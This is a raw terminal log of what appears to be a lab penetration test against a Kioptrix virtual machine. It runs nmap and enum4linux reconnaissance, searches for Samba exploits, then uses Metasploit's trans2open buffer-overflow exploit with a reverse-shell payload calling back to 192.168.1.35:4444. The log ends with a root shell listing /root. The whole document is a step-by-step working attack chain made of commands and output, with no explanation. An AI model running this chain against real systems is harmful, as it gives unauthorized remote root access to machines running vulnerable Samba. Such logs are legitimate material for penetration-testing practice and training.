root@Blue3:~# nmap -sV -sC -sS -T4 -A -p- 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 01:40 +07
Nmap scan report for 192.168.1.3
Host is up (0.00060s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-08-02T13:51:13+00:00; -4h51m11s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:31:30:86 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: -4h51m11s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.1.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.45 seconds

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# enum4linux 192.168.1.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  3 01:48:17 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.1.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================
|    Enumerating Workgroup/Domain on 192.168.1.3    |
 ===================================================
[+] Got domain/workgroup name: MYGROUP

 ===========================================
|    Nbtstat Information for 192.168.1.3    |
 ===========================================
Looking up status of 192.168.1.3
        KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
        KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
        KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
        MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================
|    Session Check on 192.168.1.3    |
 ====================================
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.99-dev                          ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > search smb_version

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection


msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > info

       Name: SMB Version Detection
     Module: auxiliary/scanner/smb/smb_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <x@hdm.io>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  SMBDomain  .                no        The Windows domain to use for authentication
  SMBPass                     no        The password for the specified username
  SMBUser                     no        The username to authenticate as
  THREADS    1                yes       The number of concurrent threads (max one per host)

Description:
  Display version information about each system

msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.1.3:139       - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.1.3:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > exit

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# searchsploit samba
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions                                                                | php/webapps/4575.txt
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Service)                                               | windows/dos/148.sh
Samba 1.9.19 - 'Password' Remote Buffer Overflow                                                                              | linux/remote/20308.c
Samba 2.0.7 - SWAT Logfile Permissions                                                                                        | linux/local/20341.sh
Samba 2.0.7 - SWAT Logging Failure                                                                                            | unix/remote/20340.c
Samba 2.0.7 - SWAT Symlink (1)                                                                                                | linux/local/20338.c
Samba 2.0.7 - SWAT Symlink (2)                                                                                                | linux/local/20339.sh
Samba 2.0.x - Insecure TMP File Symbolic Link                                                                                 | linux/local/20776.c
Samba 2.0.x/2.2 - Arbitrary File Creation                                                                                     | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                                  | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)                                                       | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                                                             | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation                                               | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                                                           | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                                                             | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)                                                       | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution                                                                     | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                                                                    | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                                                                    | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                                                                    | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                                                                    | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                                                                          | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow                                                       | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                                                                          | linux/remote/7.pl
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                          | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                        | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                              | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                                            | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                        | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                      | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                                      | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                                             | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                                                              | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)                                                       | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                                                                 | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)                                   | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                                                                     | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                                                                        | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                                                         | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                                                           | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)                                  | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                                                                    | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                                                                    | linux/dos/27778.txt
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory                                                      | multiple/remote/41740.txt
Samba < 2.0.5 - Local Overflow                                                                                                | linux/local/19428.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                                                             | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                                                                         | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                 | linux_x86/dos/36741.py
Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service                                                                       | windows/dos/2934.php
Sambar Server 4.1 Beta - Admin Access                                                                                         | cgi/remote/20570.txt
Sambar Server 4.2 Beta 7 - Batch CGI                                                                                          | windows/remote/19761.txt
Sambar Server 4.3/4.4 Beta 3 - Search CGI                                                                                     | windows/remote/20223.txt
Sambar Server 4.4/5.0 - 'pagecount' File Overwrite                                                                            | multiple/remote/21026.txt
Sambar Server 4.x/5.0 - Insecure Default Password Protection                                                                  | multiple/remote/21027.txt
Sambar Server 5.1 - Sample Script Denial of Service                                                                           | windows/dos/21228.c
Sambar Server 5.1 - Script Source Disclosure                                                                                  | cgi/remote/21390.txt
Sambar Server 5.x - 'results.stm' Cross-Site Scripting                                                                        | windows/remote/22185.txt
Sambar Server 5.x - Information Disclosure                                                                                    | windows/remote/22434.txt
Sambar Server 5.x - Open Proxy / Authentication Bypass                                                                        | windows/remote/24076.txt
Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting                                                      | windows/remote/25694.txt
Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting                                                            | windows/remote/25695.txt
Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting                                                               | windows/remote/25696.txt
Sambar Server 6 - Search Results Buffer Overflow (Metasploit)                                                                 | windows/remote/16756.rb
Sambar Server 6.0 - 'results.stm' POST Buffer Overflow                                                                        | windows/dos/23664.py
Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting                                                               | windows/remote/24161.txt
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access                                                                | windows/remote/24163.txt
Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting                                                          | windows/remote/24162.txt
SWAT Samba Web Administration Tool - Cross-Site Request Forgery                                                               | cgi/webapps/17577.txt
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

=> Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                               | osx/remote/9924.rb
#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.99-dev                          ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)


Interact with a module by name or index, for example use 3 or use exploit/solaris/samba/trans2open

msf5 > use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/samba/trans2open) > info

       Name: Samba trans2open Overflow (Linux x86)
     Module: exploit/linux/samba/trans2open
   Platform: Linux
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2003-04-07

Provided by:
  hdm <x@hdm.io>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Samba 2.2.x - Bruteforce

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This exploits the buffer overflow found in Samba versions 2.2.0 to
  2.2.8. This particular module is capable of exploiting the flaw on
  x86 Linux systems that do not have the noexec stack option set.
  NOTE: Some older versions of RedHat do not seem to be vulnerable
  since they apparently do not allow anonymous access to IPC.

References:
  https://cvedetails.com/cve/CVE-2003-0201/
  OSVDB (4469)
  http://www.securityfocus.com/bid/7294
  https://seclists.org/bugtraq/2003/Apr/103

msf5 exploit(linux/samba/trans2open) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf5 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.1.35:4444
[*] 192.168.1.3:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffafc...
[*] Sending stage (980808 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.3:1025) at 2020-08-03 01:56:12 +0700
[*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.3:139 - Trying return address 0xbffff9fc...
[*] Sending stage (980808 bytes) to 192.168.1.3
[*] 192.168.1.3 - Meterpreter session 2 closed.  Reason: Died
[*] Meterpreter session 2 opened (192.168.1.35:4444 -> 127.0.0.1) at 2020-08-03 01:56:14 +0700
[*] 192.168.1.3:139 - Trying return address 0xbffff8fc...
[*] Sending stage (980808 bytes) to 192.168.1.3
[*] Meterpreter session 3 opened (192.168.1.35:4444 -> 192.168.1.3:1027) at 2020-08-03 01:56:15 +0700
[*] 192.168.1.3 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.1.3:139 - Trying return address 0xbffff7fc...
[*] Sending stage (980808 bytes) to 192.168.1.3
[*] 192.168.1.3 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 4 opened (192.168.1.35:4444 -> 127.0.0.1) at 2020-08-03 01:56:16 +0700
[*] 192.168.1.3:139 - Trying return address 0xbffff6fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff5fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff4fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff3fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff2fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff1fc...
[*] 192.168.1.3:139 - Trying return address 0xbffff0fc...
[*] 192.168.1.3:139 - Trying return address 0xbfffeffc...
[*] 192.168.1.3:139 - Trying return address 0xbfffeefc...
[*] 192.168.1.3:139 - Trying return address 0xbfffedfc...
^C[-] 192.168.1.3:139 - Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted

=> SET PAYLOAD is a must

msf5 exploit(linux/samba/trans2open) > set payload
set payload                    set payloaduuidname            set payloaduuidseed
set payloadprocesscommandline  set payloaduuidraw             set payloaduuidtracking
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/
set payload linux/x86/adduser                         set payload linux/x86/shell/bind_ipv6_tcp
set payload linux/x86/chmod                           set payload linux/x86/shell/bind_ipv6_tcp_uuid
set payload linux/x86/exec                            set payload linux/x86/shell/bind_nonx_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp       set payload linux/x86/shell/bind_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid  set payload linux/x86/shell/bind_tcp_uuid
set payload linux/x86/meterpreter/bind_nonx_tcp       set payload linux/x86/shell/reverse_ipv6_tcp
set payload linux/x86/meterpreter/bind_tcp            set payload linux/x86/shell/reverse_nonx_tcp
set payload linux/x86/meterpreter/bind_tcp_uuid       set payload linux/x86/shell/reverse_tcp
set payload linux/x86/meterpreter/reverse_ipv6_tcp    set payload linux/x86/shell/reverse_tcp_uuid
set payload linux/x86/meterpreter/reverse_nonx_tcp    set payload linux/x86/shell_bind_ipv6_tcp
set payload linux/x86/meterpreter/reverse_tcp         set payload linux/x86/shell_bind_tcp
set payload linux/x86/meterpreter/reverse_tcp_uuid    set payload linux/x86/shell_bind_tcp_random_port
set payload linux/x86/metsvc_bind_tcp                 set payload linux/x86/shell_reverse_tcp
set payload linux/x86/metsvc_reverse_tcp              set payload linux/x86/shell_reverse_tcp_ipv6
set payload linux/x86/read_file
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.1.35:4444
[*] 192.168.1.3:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.3:139 - Trying return address 0xbffffafc...
[*] Command shell session 5 opened (192.168.1.35:4444 -> 192.168.1.3:1029) at 2020-08-03 01:57:19 +0700

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
ls -ltra
total 23
-rwsr-sr-x    1 root     root        19920 Aug  2 08:56 p
drwxr-xr-x   19 root     root         1024 Aug  2 14:49 ..
drwxrwxrwt    2 root     root         1024 Aug  2 14:49 .
pwd
/tmp
cd ../
cd /root
ls -ltra
total 12
-rw-r--r--    1 root     root         1126 Aug 23  1995 .Xresources
-rw-r--r--    1 root     root          176 Aug 23  1995 .bashrc
-rw-r--r--    1 root     root           24 Jun 10  2000 .bash_logout
-rw-r--r--    1 root     root          210 Jun 10  2000 .cshrc
-rw-r--r--    1 root     root          196 Jul 11  2000 .tcshrc
-rw-r--r--    1 root     root          234 Jul  5  2001 .bash_profile
-rw-r--r--    1 root     root         1303 Sep 26  2009 anaconda-ks.cfg
drwxr-x---    2 root     root         1024 Sep 26  2009 .
-rw-------    1 root     root          147 Oct 12  2009 .bash_history
drwxr-xr-x   19 root     root         1024 Aug  2 14:49 ..
